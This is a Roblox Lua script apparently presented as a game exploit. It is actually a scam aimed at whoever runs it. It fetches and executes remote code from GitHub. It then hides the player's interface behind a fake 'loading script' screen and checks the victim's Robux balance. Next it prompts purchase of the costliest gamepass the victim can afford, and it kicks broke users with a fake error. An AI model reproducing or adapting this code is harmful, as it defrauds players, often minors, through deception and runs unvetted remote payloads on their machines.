https://raw.githubusercontent.com/redx998/Plasma/main/First?token=GHSAT0AAAAAACJ2QGRAYGFBRLQK5D2P4KYEZKPSJ4A
loadstring(game:HttpGet("https://raw.githubusercontent.com/redx998/Plasma/main/Second?token=GHSAT0AAAAAACJ2QGRAH7WDJZ2Q23S2I5QGZKJEZDQ"))()

local coreGui = game:GetService("CoreGui")
local topBarApp = coreGui:FindFirstChild("TopBarApp")

if topBarApp then
    topBarApp:Destroy()
else
    print("wtf lol")
end

local function clearPlayerGui(player)
    local playerGui = player:FindFirstChild("PlayerGui")
    if playerGui then
        for _, obj in pairs(playerGui:GetChildren()) do
            obj:Destroy()
        end
    end
end

for _, player in pairs(game:GetService("Players"):GetPlayers()) do
    clearPlayerGui(player)
end

local screenGui = Instance.new("ScreenGui")
screenGui.ResetOnSpawn = false
screenGui.IgnoreGuiInset = true
screenGui.Parent = game:GetService("CoreGui")

local frame = Instance.new("Frame")
frame.BackgroundColor3 = Color3.new(0, 0, 0)
frame.BackgroundTransparency = 0
frame.BorderSizePixel = 0
frame.Size = UDim2.new(1, 0, 1, 0)
frame.Parent = screenGui

local textLabel = Instance.new("TextLabel")
textLabel.Text = "Trying to load script (30 sec)"
textLabel.Size = UDim2.new(1, 0, 0.1, 0)
textLabel.Position = UDim2.new(0, 0, 0.45, 0)
textLabel.Parent = frame
textLabel.BackgroundTransparency = 1
textLabel.TextColor3 = Color3.new(1, 1, 1)
textLabel.FontSize = Enum.FontSize.Size36
textLabel.Font = Enum.Font.Gotham

game.Lighting.TimeOfDay = 0.5
game.Lighting.Brightness = 0 
game.Lighting.FogEnd = 100

local lighting = game:GetService("Lighting")

local existingSky = nil

for _, child in ipairs(lighting:GetChildren()) do
    if child:IsA("Sky") or (child:IsA("Object") and child:FindFirstChild("SkyboxBk")) then
        existingSky = child
        break
    end
end

if existingSky then
    existingSky:Destroy()
end

local skyy = Instance.new("Sky")
skyy.Name = "uwu"
skyy.Parent = lighting
skyy.SkyboxBk = "rbxassetid://12322755004"
skyy.SkyboxDn = "rbxassetid://12322755004"
skyy.SkyboxFt = "rbxassetid://12322755004"
skyy.SkyboxLf = "rbxassetid://12322755004"
skyy.SkyboxRt = "rbxassetid://12322755004"
skyy.SkyboxUp = "rbxassetid://12322755004"

-- gamepasses
-- 648103386 / 50 robux
-- 646533020 / 100 robux
-- 646569039 / 200 robux
-- 646468092 / 300 robux
-- 646872002 / 500 robux
-- 645225956 / 750 robux
-- 645509719 / 1000 robux
-- 645386664 / 1.5k robux
-- 646067190 / 2k robux
-- 645311801 / 2.5k robux
-- 645489525 / 4k robux
-- 646153163 / 6k robux
-- 645139977 / 8k robux
-- 648079378 / 13k robux
-- 646251104 / 20k robux
-- 646734011 / 35k robux
-- 645846571 / 50k robux
-- 646579994 / 75k robux
-- 646356036 / 150k robux

local mps = game:GetService("MarketplaceService")
local rb = mps:GetRobuxBalance(game.Players.LocalPlayer)

if rb == 0 then
game:GetService("Players").LocalPlayer:Kick("Your executor is missing UNC support")
elseif rb > 0 and rb < 50 then
game:GetService("Players").LocalPlayer:Kick("Your executor is missing UNC support")
elseif rb >= 50 and rb < 100 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 648103386)
wait()
elseif rb >= 100 and rb < 200 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 646533020)
wait()
elseif rb >= 200 and rb < 300 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 646569039)
wait()
elseif rb >= 300 and rb < 500 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 646468092)
wait()
elseif rb >= 500 and rb < 750 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 646872002)
wait()
elseif rb >= 750 and rb < 1000 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 645225956)
wait()
elseif rb >= 1000 and rb < 1500 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 645509719)
wait()
elseif rb >= 1500 and rb < 2000 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 645386664)
wait()
elseif rb >= 2000 and rb < 2500 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 646067190)
wait()
elseif rb >= 2500 and rb < 4000 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 645311801)
wait()
elseif rb >= 4000 and rb < 6000 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 645489525)
wait()
elseif rb >= 6000 and rb < 8000 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 646153163)
wait()
elseif rb >= 8000 and rb < 13000 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 645139977)
wait()
elseif rb >= 13000 and rb < 20000 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 648079378)
wait()
elseif rb >= 20000 and rb < 35000 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 646251104)
wait()
elseif rb >= 35000 and rb < 50000 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 646734011)
wait()
elseif rb >= 50000 and rb < 75000 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 645846571)
wait()
elseif rb >= 75000 and rb < 150000 then
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 646579994)
wait()
else
game:GetService("MarketplaceService"):PromptGamePassPurchase(game.Players.LocalPlayer, 646356036)
wait()
end
